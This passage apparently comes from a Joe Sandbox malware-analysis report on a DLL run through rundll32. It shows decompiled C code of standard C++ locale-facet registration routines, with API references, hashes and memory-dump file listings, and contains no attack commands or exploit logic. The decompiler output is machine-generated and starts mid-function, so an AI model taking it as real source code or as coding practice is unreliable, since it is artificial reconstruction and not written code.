																												E6E1E1438(_t902 - 0x20);
																												E6E223D74(_t902 - 0x20, 0x6e2c3504);
																												asm("int3");
																												E6E2200AC(0x6e2683cf, _t637, _t847, _t868, 0x14);
																												E6E206653(_t902 - 0x14, 0);
																												_t869 =  *0x6e2c6df8; // 0x0
																												 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																												 *(_t902 - 0x10) = _t869;
																												_t397 = E6E1E161C(0x6e2c6da4);
																												_t696 =  *((intOrPtr*)(_t902 + 8));
																												_t848 = E6E1E171B( *((intOrPtr*)(_t902 + 8)), _t397);
																												__eflags = _t848;
																												if(_t848 != 0) {
																													L61:
																													E6E2066BA(_t902 - 0x14);
																													return E6E220075(_t848);
																												} else {
																													__eflags = _t869;
																													if(_t869 == 0) {
																														_push( *((intOrPtr*)(_t902 + 8)));
																														_push(_t902 - 0x10);
																														__eflags = E6E211127(_t637, _t696, _t838, _t848, _t869) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E1E1438(_t902 - 0x20);
																															E6E223D74(_t902 - 0x20, 0x6e2c3504);
																															asm("int3");
																															E6E2200AC(0x6e2683cf, _t637, _t848, _t869, 0x14);
																															E6E206653(_t902 - 0x14, 0);
																															_t870 =  *0x6e2c6df4; // 0x0
																															 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																															 *(_t902 - 0x10) = _t870;
																															_t410 = E6E1E161C(0x6e2c6da0);
																															_t703 =  *((intOrPtr*)(_t902 + 8));
																															_t849 = E6E1E171B( *((intOrPtr*)(_t902 + 8)), _t410);
																															__eflags = _t849;
																															if(_t849 != 0) {
																																L68:
																																E6E2066BA(_t902 - 0x14);
																																return E6E220075(_t849);
																															} else {
																																__eflags = _t870;
																																if(_t870 == 0) {
																																	_push( *((intOrPtr*)(_t902 + 8)));
																																	_push(_t902 - 0x10);
																																	__eflags = E6E2111AB(_t637, _t703, _t838, _t849, _t870) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6E1E1438(_t902 - 0x20);
																																		E6E223D74(_t902 - 0x20, 0x6e2c3504);
																																		asm("int3");
																																		E6E2200AC(0x6e2683cf, _t637, _t849, _t870, 0x14);
																																		E6E206653(_t902 - 0x14, 0);
																																		_t871 =  *0x6e2c6dc8; // 0x0
																																		 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																		 *(_t902 - 0x10) = _t871;
																																		_t423 = E6E1E161C(0x6e2c6d7c);
																																		_t710 =  *((intOrPtr*)(_t902 + 8));
																																		_t850 = E6E1E171B( *((intOrPtr*)(_t902 + 8)), _t423);
																																		__eflags = _t850;
																																		if(_t850 != 0) {
																																			L75:
																																			E6E2066BA(_t902 - 0x14);
																																			return E6E220075(_t850);
																																		} else {
																																			__eflags = _t871;
																																			if(_t871 == 0) {
																																				_push( *((intOrPtr*)(_t902 + 8)));
																																				_push(_t902 - 0x10);
																																				__eflags = E6E211230(_t637, _t710, _t838, _t850, _t871) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6E1E1438(_t902 - 0x20);
																																					E6E223D74(_t902 - 0x20, 0x6e2c3504);
																																					asm("int3");
																																					E6E2200AC(0x6e2683cf, _t637, _t850, _t871, 0x14);
																																					E6E206653(_t902 - 0x14, 0);
																																					_t872 =  *0x6e2c6dc4; // 0x0
																																					 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																					 *(_t902 - 0x10) = _t872;
																																					_t436 = E6E1E161C(0x6e2c6d78);
																																					_t717 =  *((intOrPtr*)(_t902 + 8));
																																					_t851 = E6E1E171B( *((intOrPtr*)(_t902 + 8)), _t436);
																																					__eflags = _t851;
																																					if(_t851 != 0) {
																																						L82:
																																						E6E2066BA(_t902 - 0x14);
																																						return E6E220075(_t851);
																																					} else {
																																						__eflags = _t872;
																																						if(_t872 == 0) {
																																							_push( *((intOrPtr*)(_t902 + 8)));
																																							_push(_t902 - 0x10);
																																							__eflags = E6E2112B4(_t637, _t717, _t838, _t851, _t872) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6E1E1438(_t902 - 0x20);
																																								E6E223D74(_t902 - 0x20, 0x6e2c3504);
																																								asm("int3");
																																								E6E2200AC(0x6e2683cf, _t637, _t851, _t872, 0x14);
																																								E6E206653(_t902 - 0x14, 0);
																																								_t873 =  *0x6e2c6dd8; // 0x0
																																								 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																								 *(_t902 - 0x10) = _t873;
																																								_t449 = E6E1E161C(0x6e2c6d84);
																																								_t724 =  *((intOrPtr*)(_t902 + 8));
																																								_t852 = E6E1E171B( *((intOrPtr*)(_t902 + 8)), _t449);
																																								__eflags = _t852;
																																								if(_t852 != 0) {
																																									L89:
																																									E6E2066BA(_t902 - 0x14);
																																									return E6E220075(_t852);
																																								} else {
																																									__eflags = _t873;
																																									if(_t873 == 0) {
																																										_push( *((intOrPtr*)(_t902 + 8)));
																																										_push(_t902 - 0x10);
																																										__eflags = E6E211339(_t637, _t724, _t838, _t852, _t873) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6E1E1438(_t902 - 0x20);
																																											E6E223D74(_t902 - 0x20, 0x6e2c3504);
																																											asm("int3");
																																											E6E2200AC(0x6e2683cf, _t637, _t852, _t873, 0x14);
																																											E6E206653(_t902 - 0x14, 0);
																																											_t874 =  *0x6e2c6db0; // 0x0
																																											 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																											 *(_t902 - 0x10) = _t874;
																																											_t462 = E6E1E161C(0x6e2c6d64);
																																											_t731 =  *((intOrPtr*)(_t902 + 8));
																																											_t853 = E6E1E171B( *((intOrPtr*)(_t902 + 8)), _t462);
																																											__eflags = _t853;
																																											if(_t853 != 0) {
																																												L96:
																																												E6E2066BA(_t902 - 0x14);
																																												return E6E220075(_t853);
																																											} else {
																																												__eflags = _t874;
																																												if(_t874 == 0) {
																																													_push( *((intOrPtr*)(_t902 + 8)));
																																													_push(_t902 - 0x10);
																																													__eflags = E6E2113A1(_t637, _t731, _t838, _t853, _t874) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E6E1E1438(_t902 - 0x20);
																																														E6E223D74(_t902 - 0x20, 0x6e2c3504);
																																														asm("int3");
																																														E6E2200AC(0x6e2683cf, _t637, _t853, _t874, 0x14);
																																														E6E206653(_t902 - 0x14, 0);
																																														_t875 =  *0x6e2c6ddc; // 0x0
																																														 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																														 *(_t902 - 0x10) = _t875;
																																														_t475 = E6E1E161C(0x6e2c6d88);
																																														_t738 =  *((intOrPtr*)(_t902 + 8));
																																														_t854 = E6E1E171B( *((intOrPtr*)(_t902 + 8)), _t475);
																																														__eflags = _t854;
																																														if(_t854 != 0) {
																																															L103:
																																															E6E2066BA(_t902 - 0x14);
																																															return E6E220075(_t854);
																																														} else {
																																															__eflags = _t875;
																																															if(_t875 == 0) {
																																																_push( *((intOrPtr*)(_t902 + 8)));
																																																_push(_t902 - 0x10);
																																																__eflags = E6E211409(_t637, _t738, _t838, _t854, _t875) - 0xffffffff;
																																																if(__eflags == 0) {
																																																	E6E1E1438(_t902 - 0x20);
																																																	E6E223D74(_t902 - 0x20, 0x6e2c3504);
																																																	asm("int3");
																																																	E6E2200AC(0x6e2683cf, _t637, _t854, _t875, 0x14);
																																																	E6E206653(_t902 - 0x14, 0);
																																																	_t876 =  *0x6e2c6de0; // 0x0
																																																	 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																																	 *(_t902 - 0x10) = _t876;
																																																	_t488 = E6E1E161C(0x6e2c6d8c);
																																																	_t745 =  *((intOrPtr*)(_t902 + 8));
																																																	_t855 = E6E1E171B( *((intOrPtr*)(_t902 + 8)), _t488);
																																																	__eflags = _t855;
																																																	if(_t855 != 0) {
																																																		L110:
																																																		E6E2066BA(_t902 - 0x14);
																																																		return E6E220075(_t855);
																																																	} else {
																																																		__eflags = _t876;
																																																		if(_t876 == 0) {
																																																			_push( *((intOrPtr*)(_t902 + 8)));
																																																			_push(_t902 - 0x10);
																																																			__eflags = E6E211471(_t637, _t745, _t838, _t855, _t876) - 0xffffffff;
																																																			if(__eflags == 0) {
																																																				E6E1E1438(_t902 - 0x20);
																																																				E6E223D74(_t902 - 0x20, 0x6e2c3504);
																																																				asm("int3");
																																																				E6E2200AC(0x6e2683cf, _t637, _t855, _t876, 0x14);
																																																				E6E206653(_t902 - 0x14, 0);
																																																				_t877 =  *0x6e2c6dfc; // 0x0
																																																				 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																																				 *(_t902 - 0x10) = _t877;
																																																				_t501 = E6E1E161C(0x6e2c6da8);
																																																				_t752 =  *((intOrPtr*)(_t902 + 8));
																																																				_t856 = E6E1E171B( *((intOrPtr*)(_t902 + 8)), _t501);
																																																				__eflags = _t856;
																																																				if(_t856 != 0) {
																																																					L117:
																																																					E6E2066BA(_t902 - 0x14);
																																																					return E6E220075(_t856);
																																																				} else {
																																																					__eflags = _t877;
																																																					if(_t877 == 0) {
																																																						_push( *((intOrPtr*)(_t902 + 8)));
																																																						_push(_t902 - 0x10);
																																																						__eflags = E6E2114EC(_t637, _t752, _t838, _t856, _t877) - 0xffffffff;
																																																						if(__eflags == 0) {
																																																							E6E1E1438(_t902 - 0x20);
																																																							E6E223D74(_t902 - 0x20, 0x6e2c3504);
																																																							asm("int3");
																																																							E6E2200AC(0x6e2683cf, _t637, _t856, _t877, 0x14);
																																																							E6E206653(_t902 - 0x14, 0);
																																																							_t878 =  *0x6e2c6dcc; // 0x0
																																																							 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																																							 *(_t902 - 0x10) = _t878;
																																																							_t514 = E6E1E161C(0x6e2c6d80);
																																																							_t759 =  *((intOrPtr*)(_t902 + 8));
																																																							_t857 = E6E1E171B( *((intOrPtr*)(_t902 + 8)), _t514);
																																																							__eflags = _t857;
																																																							if(_t857 != 0) {
																																																								L124:
																																																								E6E2066BA(_t902 - 0x14);
																																																								return E6E220075(_t857);
																																																							} else {
																																																								__eflags = _t878;
																																																								if(_t878 == 0) {
																																																									_push( *((intOrPtr*)(_t902 + 8)));
																																																									_push(_t902 - 0x10);
																																																									__eflags = E6E211558(_t637, _t759, _t838, _t857, _t878) - 0xffffffff;
																																																									if(__eflags == 0) {
																																																										E6E1E1438(_t902 - 0x20);
																																																										E6E223D74(_t902 - 0x20, 0x6e2c3504);
																																																										asm("int3");
																																																										E6E2200AC(0x6e2683cf, _t637, _t857, _t878, 0x14);
																																																										E6E206653(_t902 - 0x14, 0);
																																																										_t879 =  *0x6e2c6e00; // 0x0
																																																										 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																																										 *(_t902 - 0x10) = _t879;
																																																										_t527 = E6E1E161C(0x6e2c6dac);
																																																										_t766 =  *((intOrPtr*)(_t902 + 8));
																																																										_t858 = E6E1E171B( *((intOrPtr*)(_t902 + 8)), _t527);
																																																										__eflags = _t858;
																																																										if(_t858 != 0) {
																																																											L131:
																																																											E6E2066BA(_t902 - 0x14);
																																																											return E6E220075(_t858);
																																																										} else {
																																																											__eflags = _t879;
																																																											if(_t879 == 0) {
																																																												_push( *((intOrPtr*)(_t902 + 8)));
																																																												_push(_t902 - 0x10);
																																																												__eflags = E6E2115C4(_t637, _t766, _t838, _t858, _t879) - 0xffffffff;
																																																												if(__eflags == 0) {
																																																													E6E1E1438(_t902 - 0x20);
																																																													E6E223D74(_t902 - 0x20, 0x6e2c3504);
																																																													asm("int3");
																																																													E6E2200AC(0x6e2683cf, _t637, _t858, _t879, 0x14);
																																																													E6E206653(_t902 - 0x14, 0);
																																																													_t880 =  *0x6e2c6dd0; // 0x0
																																																													 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																																													 *(_t902 - 0x10) = _t880;
																																																													_t540 = E6E1E161C(0x6e2c6d60);
																																																													_t773 =  *((intOrPtr*)(_t902 + 8));
																																																													_t859 = E6E1E171B( *((intOrPtr*)(_t902 + 8)), _t540);
																																																													__eflags = _t859;
																																																													if(_t859 != 0) {
																																																														L138:
																																																														E6E2066BA(_t902 - 0x14);
																																																														return E6E220075(_t859);
																																																													} else {
																																																														__eflags = _t880;
																																																														if(_t880 == 0) {
																																																															_push( *((intOrPtr*)(_t902 + 8)));
																																																															_push(_t902 - 0x10);
																																																															__eflags = E6E21162A(_t637, _t773, _t838, _t859, _t880) - 0xffffffff;
																																																															if(__eflags == 0) {
																																																																_t777 = _t902 - 0x20;
																																																																E6E1E1438(_t777);
																																																																E6E223D74(_t902 - 0x20, 0x6e2c3504);
																																																																asm("int3");
																																																																E6E2200AC(0x6e26851f, _t637, _t859, _t880, 4);
																																																																_t881 = _t777;
																																																																 *(_t902 - 0x10) = _t881;
																																																																 *((intOrPtr*)(_t881 + 4)) =  *((intOrPtr*)(_t902 + 0xc));
																																																																_push( *((intOrPtr*)(_t902 + 0x14)));
																																																																_t287 = _t902 - 4;
																																																																 *_t287 =  *(_t902 - 4) & 0x00000000;
																																																																__eflags =  *_t287;
																																																																 *_t881 = 0x6e26c0c4;
																																																																 *((char*)(_t881 + 0x28)) =  *((intOrPtr*)(_t902 + 0x10));
																																																																E6E21542F(_t637, _t777, _t838, _t859, _t881,  *_t287);
																																																																return E6E220075(_t881,  *((intOrPtr*)(_t902 + 8)));
																																																															} else {
																																																																_t859 =  *(_t902 - 0x10);
																																																																 *(_t902 - 0x10) = _t859;
																																																																 *(_t902 - 4) = 1;
																																																																E6E206FD3(__eflags, _t859);
																																																																 *0x6e26a26c();
																																																																 *((intOrPtr*)( *((intOrPtr*)( *_t859 + 4))))();
																																																																 *0x6e2c6dd0 = _t859;
																																																																goto L138;
																																																															}
																																																														} else {
																																																															_t859 = _t880;
																																																															goto L138;
																																																														}
																																																													}
																																																												} else {
																																																													_t858 =  *(_t902 - 0x10);
																																																													 *(_t902 - 0x10) = _t858;
																																																													 *(_t902 - 4) = 1;
																																																													E6E206FD3(__eflags, _t858);
																																																													 *0x6e26a26c();
																																																													 *((intOrPtr*)( *((intOrPtr*)( *_t858 + 4))))();
																																																													 *0x6e2c6e00 = _t858;
																																																													goto L131;
																																																												}
																																																											} else {
																																																												_t858 = _t879;
																																																												goto L131;
																																																											}
																																																										}
																																																									} else {
																																																										_t857 =  *(_t902 - 0x10);
																																																										 *(_t902 - 0x10) = _t857;
																																																										 *(_t902 - 4) = 1;
																																																										E6E206FD3(__eflags, _t857);
																																																										 *0x6e26a26c();
																																																										 *((intOrPtr*)( *((intOrPtr*)( *_t857 + 4))))();
																																																										 *0x6e2c6dcc = _t857;
																																																										goto L124;
																																																									}
																																																								} else {
																																																									_t857 = _t878;
																																																									goto L124;
																																																								}
																																																							}
																																																						} else {
																																																							_t856 =  *(_t902 - 0x10);
																																																							 *(_t902 - 0x10) = _t856;
																																																							 *(_t902 - 4) = 1;
																																																							E6E206FD3(__eflags, _t856);
																																																							 *0x6e26a26c();
																																																							 *((intOrPtr*)( *((intOrPtr*)( *_t856 + 4))))();
																																																							 *0x6e2c6dfc = _t856;
																																																							goto L117;
																																																						}
																																																					} else {
																																																						_t856 = _t877;
																																																						goto L117;
																																																					}
																																																				}
																																																			} else {
																																																				_t855 =  *(_t902 - 0x10);
																																																				 *(_t902 - 0x10) = _t855;
																																																				 *(_t902 - 4) = 1;
																																																				E6E206FD3(__eflags, _t855);
																																																				 *0x6e26a26c();
																																																				 *((intOrPtr*)( *((intOrPtr*)( *_t855 + 4))))();
																																																				 *0x6e2c6de0 = _t855;
																																																				goto L110;
																																																			}
																																																		} else {
																																																			_t855 = _t876;
																																																			goto L110;
																																																		}
																																																	}
																																																} else {
																																																	_t854 =  *(_t902 - 0x10);
																																																	 *(_t902 - 0x10) = _t854;
																																																	 *(_t902 - 4) = 1;
																																																	E6E206FD3(__eflags, _t854);
																																																	 *0x6e26a26c();
																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t854 + 4))))();
																																																	 *0x6e2c6ddc = _t854;
																																																	goto L103;
																																																}
																																															} else {
																																																_t854 = _t875;
																																																goto L103;
																																															}
																																														}
																																													} else {
																																														_t853 =  *(_t902 - 0x10);
																																														 *(_t902 - 0x10) = _t853;
																																														 *(_t902 - 4) = 1;
																																														E6E206FD3(__eflags, _t853);
																																														 *0x6e26a26c();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t853 + 4))))();
																																														 *0x6e2c6db0 = _t853;
																																														goto L96;
																																													}
																																												} else {
																																													_t853 = _t874;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t852 =  *(_t902 - 0x10);
																																											 *(_t902 - 0x10) = _t852;
																																											 *(_t902 - 4) = 1;
																																											E6E206FD3(__eflags, _t852);
																																											 *0x6e26a26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t852 + 4))))();
																																											 *0x6e2c6dd8 = _t852;
																																											goto L89;
																																										}
																																									} else {
																																										_t852 = _t873;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t851 =  *(_t902 - 0x10);
																																								 *(_t902 - 0x10) = _t851;
																																								 *(_t902 - 4) = 1;
																																								E6E206FD3(__eflags, _t851);
																																								 *0x6e26a26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t851 + 4))))();
																																								 *0x6e2c6dc4 = _t851;
																																								goto L82;
																																							}
																																						} else {
																																							_t851 = _t872;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t850 =  *(_t902 - 0x10);
																																					 *(_t902 - 0x10) = _t850;
																																					 *(_t902 - 4) = 1;
																																					E6E206FD3(__eflags, _t850);
																																					 *0x6e26a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t850 + 4))))();
																																					 *0x6e2c6dc8 = _t850;
																																					goto L75;
																																				}
																																			} else {
																																				_t850 = _t871;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t849 =  *(_t902 - 0x10);
																																		 *(_t902 - 0x10) = _t849;
																																		 *(_t902 - 4) = 1;
																																		E6E206FD3(__eflags, _t849);
																																		 *0x6e26a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t849 + 4))))();
																																		 *0x6e2c6df4 = _t849;
																																		goto L68;
																																	}
																																} else {
																																	_t849 = _t870;
																																	goto L68;
																																}
																															}
																														} else {
																															_t848 =  *(_t902 - 0x10);
																															 *(_t902 - 0x10) = _t848;
																															 *(_t902 - 4) = 1;
																															E6E206FD3(__eflags, _t848);
																															 *0x6e26a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t848 + 4))))();
																															 *0x6e2c6df8 = _t848;
																															goto L61;
																														}
																													} else {
																														_t848 = _t869;
																														goto L61;
																													}
																												}
																											} else {
																												_t847 =  *(_t902 - 0x10);
																												 *(_t902 - 0x10) = _t847;
																												 *(_t902 - 4) = 1;
																												E6E206FD3(__eflags, _t847);
																												 *0x6e26a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t847 + 4))))();
																												 *0x6e2c6dc0 = _t847;
																												goto L54;
																											}
																										} else {
																											_t847 = _t868;
																											goto L54;
																										}
																									}
																								} else {
																									_t846 =  *(_t902 - 0x10);
																									 *(_t902 - 0x10) = _t846;
																									 *(_t902 - 4) = 1;
																									E6E206FD3(__eflags, _t846);
																									 *0x6e26a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t846 + 4))))();
																									 *0x6e2c6df0 = _t846;
																									goto L47;
																								}
																							} else {
																								_t846 = _t867;
																								goto L47;
																							}
																						}
																					} else {
																						_t845 =  *(_t902 - 0x10);
																						 *(_t902 - 0x10) = _t845;
																						 *(_t902 - 4) = 1;
																						E6E206FD3(__eflags, _t845);
																						 *0x6e26a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t845 + 4))))();
																						 *0x6e2c6dbc = _t845;
																						goto L40;
																					}
																				} else {
																					_t845 = _t866;
																					goto L40;
																				}
																			}
																		} else {
																			_t844 =  *(_t902 - 0x10);
																			 *(_t902 - 0x10) = _t844;
																			 *(_t902 - 4) = 1;
																			E6E206FD3(__eflags, _t844);
																			 *0x6e26a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t844 + 4))))();
																			 *0x6e2c6dec = _t844;
																			goto L33;
																		}
																	} else {
																		_t844 = _t865;
																		goto L33;
																	}
																}
															} else {
																_t843 =  *(_t902 - 0x10);
																 *(_t902 - 0x10) = _t843;
																 *(_t902 - 4) = 1;
																E6E206FD3(__eflags, _t843);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t843 + 4))))();
																 *0x6e2c6db8 = _t843;
																goto L26;
															}
														} else {
															_t843 = _t864;
															goto L26;
														}
													}
												} else {
													_t842 =  *(_t902 - 0x10);
													 *(_t902 - 0x10) = _t842;
													 *(_t902 - 4) = 1;
													E6E206FD3(__eflags, _t842);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t842 + 4))))();
													 *0x6e2c6de8 = _t842;
													goto L19;
												}
											} else {
												_t842 = _t863;
												goto L19;
											}
										}
									} else {
										_t841 =  *(_t902 - 0x10);
										 *(_t902 - 0x10) = _t841;
										 *(_t902 - 4) = 1;
										E6E206FD3(__eflags, _t841);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t841 + 4))))();
										 *0x6e2c6dd4 = _t841;
										goto L12;
									}
								} else {
									_t841 = _t862;
									goto L12;
								}
							}
						} else {
							_t840 =  *(_t902 - 0x10);
							 *(_t902 - 0x10) = _t840;
							 *(_t902 - 4) = 1;
							E6E206FD3(__eflags, _t840);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t840 + 4))))();
							 *0x6e2c6db4 = _t840;
							goto L5;
						}
					} else {
						_t840 = _t861;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6E20F03E
std::_Lockit::_Lockit.LIBCPMT ref: 6E20F048
int.LIBCPMT ref: 6E20F05F

Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647

collate.LIBCPMT ref: 6E20F082
std::_Facet_Register.LIBCPMT ref: 6E20F099
std::_Lockit::~_Lockit.LIBCPMT ref: 6E20F0B9
__CxxThrowException@8.LIBVCRUNTIME ref: 6E20F0D7

Strings

hm,n, xrefs: 6E20F053

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcollate
String ID: hm,n
API String ID: 2363045490-216170354
Opcode ID: 369bf358384b0891e81e77dbc458c43d2a7b9511c54c6e9f5a7545020ce64823
Instruction ID: 8519a0802e7460ad01b3930bf57e452b782981e6e66726a5dec00c1ad9930e6d
Opcode Fuzzy Hash: 369bf358384b0891e81e77dbc458c43d2a7b9511c54c6e9f5a7545020ce64823
Instruction Fuzzy Hash: 8C110676D0051ECBCF00DBE0C894AEEB7BBAF84715F240908E4106B2D4DBB59A45C791

Uniqueness

Uniqueness Score: -1.00%

Function 6E20A0FF, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 72%

			E6E20A0FF(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a8) {
				signed int _v4;
				intOrPtr _v8;
				void* _v16;
				char _v20;
				intOrPtr* _v24;
				char _v32;
				void* _t63;
				intOrPtr* _t64;
				void* _t76;
				void* _t89;
				void* _t102;
				intOrPtr* _t158;
				intOrPtr* _t174;
				intOrPtr* _t175;
				intOrPtr* _t176;
				void* _t178;
				intOrPtr* _t179;
				intOrPtr* _t180;
				void* _t181;

				_t171 = __edx;
				_t130 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653( &_v20, 0);
				_t178 =  *0x6e2c6cc8; // 0x0
				_v4 = _v4 & 0x00000000;
				_v16 = _t178;
				_t63 = E6E1E161C(0x6e2c6b38);
				_t133 = _a8;
				_t64 = E6E1E171B(_a8, _t63);
				_t173 = _t64;
				if(_t64 != 0) {
					L5:
					E6E2066BA( &_v20);
					return E6E220075(_t173);
				} else {
					if(_t178 == 0) {
						_push(_a8);
						_push( &_v16);
						__eflags = E6E20A9D2(__ebx, _t133, __edx, _t173, _t178) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438( &_v32);
							E6E223D74( &_v32, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t173, _t178, 0x14);
							E6E206653( &_v20, 0);
							_t179 =  *0x6e2c6ccc; // 0x0
							_v4 = _v4 & 0x00000000;
							_v16 = _t179;
							_t76 = E6E1E161C(0x6e2c6cb8);
							_t140 = _a8;
							_t174 = E6E1E171B(_a8, _t76);
							__eflags = _t174;
							if(_t174 != 0) {
								L12:
								E6E2066BA( &_v20);
								return E6E220075(_t174);
							} else {
								__eflags = _t179;
								if(_t179 == 0) {
									_push(_a8);
									_push( &_v16);
									__eflags = E6E20AA38(_t130, _t140, __edx, _t174, _t179) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438( &_v32);
										E6E223D74( &_v32, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t130, _t174, _t179, 0x14);
										E6E206653( &_v20, 0);
										_t180 =  *0x6e2c6cd0; // 0x0
										_v4 = _v4 & 0x00000000;
										_v16 = _t180;
										_t89 = E6E1E161C(0x6e2c6cbc);
										_t147 = _a8;
										_t175 = E6E1E171B(_a8, _t89);
										__eflags = _t175;
										if(_t175 != 0) {
											L19:
											E6E2066BA( &_v20);
											return E6E220075(_t175);
										} else {
											__eflags = _t180;
											if(_t180 == 0) {
												_push(_a8);
												_push( &_v16);
												__eflags = E6E20AAA0(_t130, _t147, __edx, _t175, _t180) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438( &_v32);
													E6E223D74( &_v32, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t130, _t175, _t180, 0x14);
													E6E206653( &_v20, 0);
													_t181 =  *0x6e2c6cd4; // 0x0
													_v4 = _v4 & 0x00000000;
													_v16 = _t181;
													_t102 = E6E1E161C(0x6e2c6cc0);
													_t154 = _a8;
													_t176 = E6E1E171B(_a8, _t102);
													__eflags = _t176;
													if(_t176 != 0) {
														L26:
														E6E2066BA( &_v20);
														return E6E220075(_t176);
													} else {
														__eflags = _t181;
														if(_t181 == 0) {
															_push(_a8);
															_push( &_v16);
															__eflags = E6E20AB08(_t130, _t154, _t171, _t176, _t181) - 0xffffffff;
															if(__eflags == 0) {
																_t158 =  &_v32;
																E6E1E1438(_t158);
																E6E223D74( &_v32, 0x6e2c3504);
																asm("int3");
																_push(_t158);
																 *((intOrPtr*)(_t158 + 4)) = _v8;
																_v24 = _t158;
																 *_t158 = 0x6e26ba24;
																return _t158;
															} else {
																_t176 = _v16;
																_v16 = _t176;
																_v4 = 1;
																E6E206FD3(__eflags, _t176);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t176 + 4))))();
																 *0x6e2c6cd4 = _t176;
																goto L26;
															}
														} else {
															_t176 = _t181;
															goto L26;
														}
													}
												} else {
													_t175 = _v16;
													_v16 = _t175;
													_v4 = 1;
													E6E206FD3(__eflags, _t175);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t175 + 4))))();
													 *0x6e2c6cd0 = _t175;
													goto L19;
												}
											} else {
												_t175 = _t180;
												goto L19;
											}
										}
									} else {
										_t174 = _v16;
										_v16 = _t174;
										_v4 = 1;
										E6E206FD3(__eflags, _t174);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t174 + 4))))();
										 *0x6e2c6ccc = _t174;
										goto L12;
									}
								} else {
									_t174 = _t179;
									goto L12;
								}
							}
						} else {
							_t173 = _v16;
							_v16 = _t173;
							_v4 = 1;
							E6E206FD3(__eflags, _t173);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t173 + 4))))();
							 *0x6e2c6cc8 = _t173;
							goto L5;
						}
					} else {
						_t173 = _t178;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6E20A106
std::_Lockit::_Lockit.LIBCPMT ref: 6E20A110
int.LIBCPMT ref: 6E20A127

Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647

ctype.LIBCPMT ref: 6E20A14A
std::_Facet_Register.LIBCPMT ref: 6E20A161
std::_Lockit::~_Lockit.LIBCPMT ref: 6E20A181
__CxxThrowException@8.LIBVCRUNTIME ref: 6E20A19F

Strings

8k,n, xrefs: 6E20A11B

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
